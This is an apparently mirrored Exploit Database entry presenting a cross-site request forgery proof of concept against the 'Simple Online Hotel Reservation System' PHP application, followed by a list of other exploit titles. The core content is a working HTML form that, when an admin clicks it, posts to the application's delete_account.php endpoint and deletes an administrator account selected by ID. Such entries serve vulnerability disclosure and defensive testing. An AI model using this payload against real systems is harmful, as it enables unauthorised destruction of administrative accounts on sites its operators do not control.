Simple Online Hotel Reservation System – Cross-Site Request Forgery (Delete Admin)

Exploit Database
18 阅读

作者： Mr Winst0n

日期： 2019-02-28
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/46463/

# Exploit Title: Simple Online Hotel Reservation System- Cross-Site Request Forgery (Delete Admin)
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan[@]gmail[.]com
# Discovery Date: February 25, 2019
# Vendor Homepage: https://code-projects.org/
# Software Link : https://code-projects.org/simple-online-hotel-reservation-system-in-php-with-source-code/
# Tested on: Kali linux, Windows 8.1 

# PoC:

<html>
<head>
	<title>Delete Admin</title>
</head>
<body>
	<form method = "POST" action="http://localhost/[PATH]/admin/delete_account.php?admin_id=1"> 
		<!-- You can change admin_id -->
		<button>Delete</button>
	</form>
</body>
</html>

last Exploits
Simple Online Hotel Reservation System – Cross-Site Request Forgery (Delete Admin)的更多信息

Web Inspiration Gallery Script 1.0.0 – ‘id’ SQL Injection：
Dell OpenManage Server Administrator 8.3 – XML External Entity：
DS3 Authentication Server – Multiple Vulnerabilities：
MLM Forex Market Plan Script 2.0.1 – SQL Injection：
OpenDocMan 1.3.4 – Cross-Site Request Forgery：
WordPress Plugin Cimy Counter – Full Path Disclosure / Redirector / Cross-Site Scripting / HTTP Response Spitting：
PHPaaCMS 0.3.1 – ‘show.php?id’ SQL Injection：
AjaxExplorer 1.10.3.2 – Multiple Vulnerabilities：